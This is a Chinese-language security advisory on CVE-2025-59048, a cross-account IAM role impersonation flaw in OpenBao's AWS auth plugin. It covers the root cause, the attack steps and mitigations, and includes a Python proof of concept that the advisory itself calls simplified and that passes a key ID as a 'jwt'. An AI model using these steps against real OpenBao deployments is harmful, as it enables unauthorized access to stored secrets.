CVE-2025-59048 OpenBao AWS插件跨账户IAM角色冒充漏洞

漏洞信息

漏洞编号

CVE-2025-59048

漏洞类型

访问控制绕过/身份验证绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenBao auth-aws plugin

漏洞概述

CVE-2025-59048是OpenBao项目中AWS认证插件的一个高危安全漏洞。该漏洞存在于OpenBao的AWS插件中，该插件根据IAM策略生成AWS访问凭证。在0.1.1之前的版本中，AWS认证方法存在跨账户IAM角色冒充（Cross-account IAM role Impersonation）漏洞。攻击者可以利用此漏洞，使用不受信任AWS账户中的IAM角色，通过冒充受信任账户中具有相同名称的角色进行身份验证，从而获得未授权访问权限。此漏洞影响所有在多账户AWS环境中使用auth-aws插件的用户，特别是那些IAM角色名称在账户间不唯一的场景。攻击者只需拥有低权限即可发起攻击，且无需用户交互即可完成身份验证绕过。

技术细节

该漏洞的根本原因在于OpenBao的AWS认证插件在验证IAM角色时，未能正确验证角色所属的AWS账户ID。攻击流程如下：1）攻击者在自己的AWS账户中创建一个与目标账户相同名称的IAM角色；2）攻击者使用该角色通过OpenBao的AWS认证方法进行身份验证；3）由于插件仅验证角色名称而未验证账户ID，系统错误地接受了来自不受信任账户的角色凭证；4）攻击者成功获取目标账户的访问权限。CVSS向量显示该漏洞可通过网络利用（AV:N），需要低权限（PR:L），无用户交互（UI:N），导致高机密性（C:H）和完整性（I:H）影响。修复版本为auth-aws plugin 0.1.1，修复方案在GitHub commit 2a77af36834746ca6d3ac9bd1049154c84b3efae中实现。

攻击链分析

STEP 1

步骤1

攻击者在自己的AWS账户中创建一个与目标受信任账户相同名称的IAM角色

STEP 2

步骤2

攻击者获取该角色的临时凭证（通过STS AssumeRole）

STEP 3

步骤3

攻击者使用获取的凭证向OpenBao的AWS认证端点（/v1/auth/aws/login）发送认证请求

STEP 4

步骤4

OpenBao的auth-aws插件仅验证角色名称，未验证AWS账户ID，导致认证成功

STEP 5

步骤5

攻击者获得OpenBao的访问令牌，可访问受信任账户对应的资源和策略

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59048 PoC - Cross-account IAM Role Impersonation
# This PoC demonstrates the concept of the vulnerability

import boto3
import json
import requests

# Configuration
OPENBAO_URL = "http://target-openbao:8200"
ATTACKER_AWS_ACCOUNT_ID = "123456789012"  # Attacker's AWS account
TARGET_ROLE_NAME = "trusted-role"  # Same name as role in trusted account

def create_iam_role_in_attacker_account():
    """Create an IAM role with the same name as the target role"""
    iam_client = boto3.client('iam')
    
    trust_policy = {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": {
                    "AWS": f"arn:aws:iam::{ATTACKER_AWS_ACCOUNT_ID}:root"
                },
                "Action": "sts:AssumeRole"
            }
        ]
    }
    
    try:
        iam_client.create_role(
            RoleName=TARGET_ROLE_NAME,
            AssumeRolePolicyDocument=json.dumps(trust_policy),
            Description="Malicious role for CVE-2025-59048 demonstration"
        )
        print(f"[+] Created IAM role: {TARGET_ROLE_NAME}")
    except iam_client.exceptions.EntityAlreadyExistsException:
        print(f"[*] Role {TARGET_ROLE_NAME} already exists")

def get_aws_identity():
    """Get current AWS identity credentials"""
    sts_client = boto3.client('sts')
    identity = sts_client.get_caller_identity()
    return identity

def authenticate_to_openbao():
    """Attempt to authenticate to OpenBao using the impersonated role"""
    # Assume role to get temporary credentials
    sts_client = boto3.client('sts')
    
    # Get role credentials (would normally require assuming the role first)
    role_credentials = sts_client.assume_role(
        RoleArn=f"arn:aws:iam::{ATTACKER_AWS_ACCOUNT_ID}:role/{TARGET_ROLE_NAME}",
        RoleSessionName="OpenBao-Exploitation"
    )
    
    # Generate signed request to OpenBao
    # The vulnerability allows this request from untrusted account to succeed
    auth_data = {
        "role": TARGET_ROLE_NAME,
        "jwt": role_credentials['Credentials']['AccessKeyId']  # Simplified
    }
    
    response = requests.post(
        f"{OPENBAO_URL}/v1/auth/aws/login",
        json=auth_data
    )
    
    if response.status_code == 200:
        print("[!] Authentication successful - Vulnerability confirmed!")
        return response.json()
    else:
        print("[-] Authentication failed")
        return None

def main():
    print("CVE-2025-59048 - OpenBao AWS Plugin Cross-account IAM Role Impersonation")
    print("=" * 80)
    
    # Step 1: Create role in attacker's account
    create_iam_role_in_attacker_account()
    
    # Step 2: Verify current identity
    identity = get_aws_identity()
    print(f"[*] Current identity: {identity['Arn']}")
    
    # Step 3: Attempt authentication to OpenBao
    result = authenticate_to_openbao()
    
    if result:
        print("[+] Received OpenBao token - exploitation successful")
        print(f"    Token: {result.get('auth', {}).get('client_token', 'N/A')[:20]}...")

if __name__ == "__main__":
    main()

影响范围

OpenBao auth-aws plugin < 0.1.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）确保所有AWS账户中的IAM角色名称全局唯一，避免跨账户使用相同角色名；2）启用AWS CloudTrail日志监控，审计所有角色假设请求，特别关注来自非预期账户的角色使用；3）实施额外的访问控制策略，在OpenBao中配置更严格的角色绑定规则；4）定期检查是否存在重复命名的IAM角色；5）考虑使用AWS Organizations实施 SCP（Service Control Policy）限制跨账户角色创建。